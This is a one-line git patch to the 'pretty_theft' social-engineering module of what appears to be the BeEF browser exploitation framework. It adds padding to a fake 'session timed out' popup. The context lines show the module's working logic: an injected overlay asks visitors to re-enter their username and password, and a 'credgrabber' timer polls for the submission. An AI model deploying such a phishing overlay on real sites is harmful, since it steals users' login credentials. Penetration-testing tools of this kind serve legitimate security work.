From 9a97ffed6e898a0d597d27d76b7c17286d96f5c6 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Wed, 19 Apr 2017 13:37:48 +0000 Subject: [PATCH] Pad bottom of generic pretty theft popup --- modules/social_engineering/pretty_theft/command.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js index 8a2b1161a..82b026dc8 100644 --- a/modules/social_engineering/pretty_theft/command.js +++ b/modules/social_engineering/pretty_theft/command.js @@ -509,7 +509,7 @@ beef.execute(function() { sneakydiv.setAttribute('style', 'width:400px;position:absolute; top:20%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000'); sneakydiv.setAttribute('align', 'center'); document.body.appendChild(sneakydiv); - sneakydiv.innerHTML= '

Your session has timed out!

For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.

Username:
Password:


'; + sneakydiv.innerHTML= '

Your session has timed out!

For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.

Username:
Password:



'; // Repeatedly check if button has been pressed credgrabber = setInterval(checker,1000);